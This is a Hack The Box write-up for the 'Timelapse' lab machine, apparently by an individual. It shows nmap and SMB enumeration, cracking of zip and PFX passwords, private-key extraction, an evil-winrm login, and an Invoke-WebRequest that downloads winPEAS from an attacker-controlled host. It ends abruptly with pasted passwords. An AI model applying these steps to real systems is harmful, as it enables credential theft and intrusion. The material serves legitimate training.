Timelapse HTB Machine
nmap -p- 10.10.11.152
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5986/tcp open wsmans syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49673/tcp open unknown syn-ack ttl 127
49674/tcp open unknown syn-ack ttl 127
49696/tcp open unknown syn-ack ttl 127
51231/tcp open unknown syn-ack ttl 127
nmap -sVC 10.10.11.152
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-06-13 15:03:29Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl? syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
smbclient -N -L 10.10.11.152
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Ivestiating we find several files on Shares share:
smbclient \\\\10.10.11.152\\Shares
LAPS_Datasheet.docx LAPS.x64.msi
LAPS_OperationsGuide.docx winrm_backup.zip
LAPS_TechnicalSpecification.docx
winrm_backup seems interesting but its password protected. DOCX Files contain documentation about how passwords are managed arround the directory.
lets try to crack the zip
fcrackzip -D -u winrm_backup.zip -p /usr/share/wordlists/rockyou.txt
PASSWORD FOUND!!!!: pw == supremelegacy
Zip password was weak: supremelegacy We obtain legacyy_dev_auth.pfx
A quick Google search about extracting cert keys from pfx: https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file but we need to obtain the pfx key first so we are gonna try to crack it using john Convert:
pfx2john legacyy_dev_auth.pfx > pfx_john_legacy.hash
john -w=/usr/share/wordlists/rockyou.txt pfx_john_legacy.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:02:13 DONE (2022-06-13 04:00) 0.007506g/s 24256p/s 24256c/s 24256C/s thuglife03282006..thug209
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Found pfx pass: thuglegacy
Now lets extract key and cert:
Extract cert:
openssl pkcs12 -in legacyy_dev_auth.pfx -out cert.pem
Extract priv key:
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv.pem -nodes
After formatting the files correctly we can connect via ssh:
evil-winrm -S -k formated/key.key -c formated/cert.crt -i 10.10.11.152
Lets run winpeas:
Invoke-WebRequest -Uri 10.10.14.20:8000/winPEASx64.exe -OutFile winpeas.exe
My pass is : E3R$Q62^12p7PLlC%KWaxuaV
``sh pass: : G!OSV[!-e[-w).,4rK6G,78/
``
Distributed under the MIT License. See LICENSE.txt
for more information.
Pol Galvez - [email protected]